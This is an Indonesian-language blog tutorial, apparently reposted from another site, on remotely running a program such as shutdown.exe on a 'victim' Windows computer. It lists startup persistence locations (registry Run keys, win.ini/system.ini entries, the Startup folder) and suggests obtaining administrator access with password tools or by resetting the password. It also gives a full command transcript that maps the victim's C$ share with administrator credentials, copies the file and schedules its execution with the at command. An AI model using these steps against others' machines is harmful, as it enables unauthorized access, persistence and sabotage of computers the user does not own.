1001 cara menuju Cina. Mungkin itulah kata yang tepat untuk menggambarkan tutor kali ini. Pernahkah anda berfikir untuk menjalankan sebuah program yang anda buat untuk dijalankan secara remote dikomputer lain? Misalnya, anda membuat program shutdown.exe untuk kepentingan Shutdown PC kantor, warnet, atau bahkan komputer korban yang ingin Anda jahili? Tak perlu berlama-lama langsung saja kita jalankan jurusnya.
Mengcopykan file jahat ke komputer korban memanglah mudah. Tetapi untuk menjalankan program tersebut adalah masalah yang berbeda. Seandainya program telah berhasil Anda copykan ke komputer korban, maka bila ingin menjalankannya, seorang hacker tidak bisa langsung mengklik program tersebut. Karena bila mengkliknya, otomatis komputernya-lah yang akan menjalankan program itu. Kata bang mamat waktu smp, “ibarat senjata makan tuan”, tentunya Anda tidak ingin seperti itu bukan?
Lalu bagaimana menjalankan program pada komputer remote?
Ada beberapa cara yang bisa dilakukan, dan hal ini memiliki spesifikasi tertentu pula pada system operasi yang digunakan oleh korban.
Lalu bagaimana menjalankan program pada komputer remote?
Ada beberapa cara yang bisa dilakukan, dan hal ini memiliki spesifikasi tertentu pula pada system operasi yang digunakan oleh korban.
1. Melakukan Perubahan Pada Registry
Untuk melakukan perubahan registry secara remote, hacker terlebih dahulu harus mendapatkan hak penuh Administrator pada komputer korban. Banyak software untuk mendapatkan password Administrator salah satunya John The Ripper yang tidak akan penulis bahas disini. Cara lainnya dengan mengetikkan command pada menu Run Lusrmgr.msc dan rubahlah pass admin dengan pass baru Anda.
Dan inilah dia lokasi penyimpanannya:
MyComputer/HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MyComputer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
MyComputer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunonceEx
2. Memanipulasi file win.ini dan system.ini
Cara ini hanya berlaku pada sitem operasi Windows 9x dan Me. Sedangkan untuk XP dan 2003 sudah tidak menggunakan file ini lagi.
Berikut contoh entry untuk dimasukkan dalam file win.ini dan system.ini :
Win.ini
Run=C:WINDOWS\SYSTEM\shutdown.exe
Load=System.ini
[boot]
Shell=Explorer.exe
C:\WINDOWS\SYSTEM\shutdown.exe
3. Menyimpan Program Pada Direktori Startup
Directory startup adalah dir khusus pada windows untuk menjalankan program secara otomatis ketika komputer dihidupkan. Bisa Anda lihat pada menu Start->All Programs->Startup. Lokasi penyimpanan file startup bisa Anda lihat di :
C:\Documents and Settings\%namauser%\StartMenu\Programs\Startup (NT, 2000, XP)
C:\WINDOWS\Start Menu\Programs\Startup (9x, Me).
4. Scheduling dengan perintah AT
Ini merupakan teknik yang paling efisien menurut saya, karena hacker tidak perlu menunggu komputer korban untuk melakukan startup. Berikut saya perlihatkan beberapa contoh penggunaan cara ini yang akan membuat komputer korban yang diremote bertekuk lutut dihadapan Anda. Hal pertama yang saya lakukan adalah melakukan Mapping drive c: dari komputer korban (192.168.100.20) menjadi drive x: pada komputer saya. Terlihat bahwa akun yang digunakan adalah Administrator dengan password “passwordnyaapa”.
Setelah koneksi diterima, saya memberikan perintah : copy shutdown.exe x: yang bertujuan mengkopikan file shutdown.exe ke komputer korban. (Dengan asumsi drive x: saya adalah drive c: computer korban) kemudian disini saya melakukan penyesuaian waktu/jam komputer korban dengan command net time \\192.168.100.20, terlihat waktu pada komputer korban menunjukan pukul 7:37AM. Langkah akhir yang paling menentukan keberhasilan ini adalah perintah scheduling yang tepat. Terlihat waktu yang ditunjukan pada komputer korban pukul 7:37AM, maka saya memberikan perintah scheduling dengan command at \\192.168.100.20 7:40A “C:shutdown.exe” untuk menjalankan program shutdown.exe pada pukul 7:40AM, tepatnya 3 menit berikutnya.
Microsoft Windows XP [Version
5.1.2600] (C) Copyright 1985-2001
Microsoft Corp.
C:\Documents and Settings\User>CD\
C:\>net use x: \\192.168.100.20\c$
/user:administrator passwordnyaapa
The command completed successfully.
C:\>copy shutdown.exe x:
1 file (s) copied.
C:\>net time \\192.168.100.20
Current time at \\192.168.100.20 is
2/21/2008 7:37 AM
The command completed successfully.
C:\>at \\192.168.100.20 7:40A
“c:\shutdown.exe”
Added a new job with job ID = 1
C:\>at \\192.168.100.20
StatusID Day Time Command Line
-------------------------------------
1 Today,7:40 AM c:\shutdown.exe
C:\>at \\192.168.100.20
There are no entries in the list.
Anda dapat menentukan waktu yang berbeda sesuai dengan waktu yang ingin Anda tetapkan.
Untuk melihat dan memastikan bahwa serangan Anda berhasil, silahkan melakukan ping atau cek scheduling yang telah Anda buat tadi dengan menggunakan command at \\192.168.100.20.
Tugas Anda selesai, silahkan duduk dan buatlah secangkir kopi untuk menunggu waktu kemenagan Anda. Salam (peterpanz)
Sumber : ilmuwebsite.com
0 komentar:
Posting Komentar